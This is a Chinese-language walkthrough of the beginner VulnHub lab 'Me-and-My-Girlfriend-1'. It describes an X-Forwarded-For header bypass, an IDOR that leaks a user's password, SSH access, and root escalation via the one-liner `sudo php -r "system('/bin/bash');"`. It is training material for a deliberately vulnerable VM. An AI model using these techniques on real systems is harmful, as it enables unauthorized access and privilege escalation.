一、Me-and-My-Girlfriend-1:
1、渗透目标:
Description: This VM tells us that there are a couple of lovers namely Alice and Bob, where
the couple was originally very romantic, but since Alice worked at a private company,
"Ceban Corp", something has changed from Alice's attitude towards Bob like something is
"hidden", And Bob asks for your help to get what Alice is hiding and get full access to the
company!
Difficulty Level: Beginner
Notes: there are 2 flag files //获取两个flag并拿到root权限
Learning: Web Application | Simple Privilege Escalation
2、环境准备:
(1) Kali_linux -> 攻击机
(2) 靶机 -> https://download.vulnhub.com/meandmygirlfriend/Me-and-My-Girlfriend-1.ova
3、渗透记录:
(1) ipconfig -> 查看Kali攻击机ip -> 192.168.80.129
(2) 因为Kali 和 目标靶机处于同一个网络,使用nmap搜集存活主机,192.168.80.128的80端口开放:
(3) 访问192.168.80.128的80端口,请求被拦截:
F12查看前端提示信息,提示XFF头绕过:
(4) XFF: 127.0.0.1绕过后可以进行新用户注册,这里注册并登录:
(5) 登录后,查看profile 中的 user_id参数存在水平越权漏洞,通过遍历user_id值查看任意用户的profile资料,当 user_id = 5时可以查看到 Alice的资料,其中包含账号 + 打码的密码,但是密码在前端未作脱敏处理导致账密泄露:
(6) 利用泄露的账密登录alice的账号进行ssh连接,实现RCE:
第一个flag在 .my_secret文件夹中的 flag1.txt中:
(7) whoami查看当前用户权限 -> alice 而非 root,所以需要进行手动提权。
使用 sudo -l 命令查看当前用户可以通过 sudo执行的命令,显示用户的 sudo 权限,包括是否需要密码以及特定的限制条件。由回显可得出结论,当前用户可以在不提供密码的情况下执行PHP脚本:
sudo php -r "system('/bin/bash');"
命令提权为root:
进入 root文件夹拿到 flag2: